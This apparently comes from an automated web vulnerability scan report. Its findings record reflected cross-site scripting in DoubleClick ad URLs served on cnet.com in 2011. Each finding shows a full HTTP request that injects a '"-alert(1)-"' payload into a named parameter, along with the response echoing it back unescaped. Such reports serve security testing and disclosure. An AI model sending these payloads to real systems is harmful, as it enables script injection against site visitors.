GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/166/%2a/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246e42f7"-alert(1)-"fff3f79dcc6&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpn
...[SNIP]...

3.191. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2d44"-alert(1)-"a0df08ac7bf was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7205

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06d2d44"-alert(1)-"a0df08ac7bf&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q1000000140300000310128004BAN181");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

3.192. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f109"-alert(1)-"d9fd11bfd28 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=54f109"-alert(1)-"d9fd11bfd28&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAAB
...[SNIP]...

3.193. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa1a"-alert(1)-"e0b3d5aee59 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0efa1a"-alert(1)-"e0b3d5aee59&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=
...[SNIP]...

3.194. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb6f7"-alert(1)-"367490e803e was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=cb6f7"-alert(1)-"367490e803e&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094
...[SNIP]...

3.195. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc88"-alert(1)-"f8894e94b96 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
og/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=5fc88"-alert(1)-"f8894e94b96&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBS
...[SNIP]...

3.196. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd34"-alert(1)-"06cd0426f9b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
0360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3fcd34"-alert(1)-"06cd0426f9b&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://w
...[SNIP]...

3.197. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7f5a"-alert(1)-"c05029232b4 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=b7f5a"-alert(1)-"c05029232b4&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=e
...[SNIP]...

3.198. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea67"-alert(1)-"667d66c1504 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4601
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:01 GMT
Expires: Wed, 27 Apr 2011 23:22:01 GMT



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=dea67"-alert(1)-"667d66c1504http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
var bg = "same as SWF";
var dca
...[SNIP]...

3.199. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbe8"-alert(1)-"7ccee170db7 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn4dbe8"-alert(1)-"7ccee170db7&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWA
...[SNIP]...

3.200. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97c91"-alert(1)-"12af05d6124 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US97c91"-alert(1)-"12af05d6124&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
